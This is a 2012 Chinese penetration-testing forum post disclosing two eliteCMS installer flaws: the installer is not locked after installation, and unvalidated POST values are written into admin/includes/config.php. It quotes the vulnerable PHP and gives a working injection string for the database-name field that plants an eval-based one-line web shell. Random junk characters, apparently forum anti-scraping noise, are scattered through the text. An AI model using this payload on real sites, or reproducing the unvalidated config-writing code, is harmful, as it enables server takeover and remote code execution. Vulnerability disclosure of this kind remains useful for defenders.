中国网络渗透测试联盟

标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞 [打印本页]
作者: admin    时间: 2012-11-18 13:59
标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
2 A6 `0 U3 ^( y3 T8 k
* U( P- ?, ~* O. K) w另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php8 t8 z5 @: t+ H( ?# [
我们来看代码:( i' v( L" Q" J/ B% j( Z
8 j5 F) {3 N8 q% Z
...
; ~- c" u* e  P1 ?! }) X) E3 aelseif ($_GET['step'] == "4") {1 [5 C  F2 R& s& V7 o
    $file = "../admin/includes/config.php";. T" m! d/ S! j4 U3 Z
    $write = "<?php\n";9 v. v4 q: i+ j+ v  j
    $write .= "/**\n";
1 ?7 x( K# q5 V' s8 R    $write .= "*\n";  J! O2 d: @! [  l9 B
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
  o; b8 k, M2 ^) ]; n4 ?...略...1 O. w$ R, |( o) v  }, ]3 @
    $write .= "*\n";
! v0 Z: @6 w) ^    $write .= "*/\n";) N) m! ]5 H' a! s
    $write .= "\n";' w# v! Q; n, U/ L
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
6 g4 C" G% G0 U0 Z4 L    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";2 \/ u5 v2 A% Z) ~- v9 q- M9 v
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
; F8 y0 Q0 ^* J: r$ u9 u' j; O    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";/ e/ c% G2 P$ L9 _, R( T
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";3 L. E* f) {6 g! O/ {1 Q' b
    $write .= "if (!\$connection) {\n";
# e! e1 B0 e7 s- j, @1 @" `& j3 o/ {    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
) ~$ ]5 c+ s5 d2 K7 H4 _+ z    $write .= "        \n";
( k( r. `& l- M" `; x$ @    $write .= "} \n";
7 M6 d2 k  J5 l    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";' B; o) U! h; D. \* f
    $write .= "if (!\$db_select) {\n";
, c& r. y9 m7 N! C7 _) H    $write .= "        die(\"Database select failed\" .mysql_error());\n";
. U/ ~) k! ^" d! M# y    $write .= "        \n";6 t+ S( Q2 m& o0 Z
    $write .= "} \n";1 b" S  Y6 w4 t. W+ w1 o
    $write .= "?>\n";
4 f+ o: h/ _9 v
% n7 N3 H) n3 o0 q    $writer = fopen($file, 'w');( ]& l8 M( h/ R8 W# x1 A2 {" Z
...
3 ^) v# W% T: K- P$ Q6 b1 } 8 Y2 S  H5 ?2 v
在看代码:
4 g$ @& K' c& D+ l4 y; Z: `* i 7 |& s1 X  p3 x: k  z: E% n
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
9 Y/ B5 F  S9 {. ^) `" Z$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
) A, w0 s+ n7 Y  q$ G& J0 f$_SESSION['DB_USER'] = $_POST['DB_USER'];
4 {$ y& O# F2 @0 ]1 u' k. V5 K$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
5 k* C3 o% Q2 T! G4 F+ k7 T0 [
. h1 r) p0 G1 }" J取值未作任何验证, y  F+ t/ |+ o
如果将数据库名POST数据:
4 q: `/ b# ^0 S: w$ v4 M7 [8 p ) B2 ~2 G, ?1 o, U/ v
"?><?php eval($_POST[c]);?><?php# j% n; {# ^& `7 K& H- r5 K5 I
) h( \2 p$ c: V! s7 K1 [6 d
将导致一句话后门写入/admin/includes/config.php
* T2 k3 e& J) a7 y5 v



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2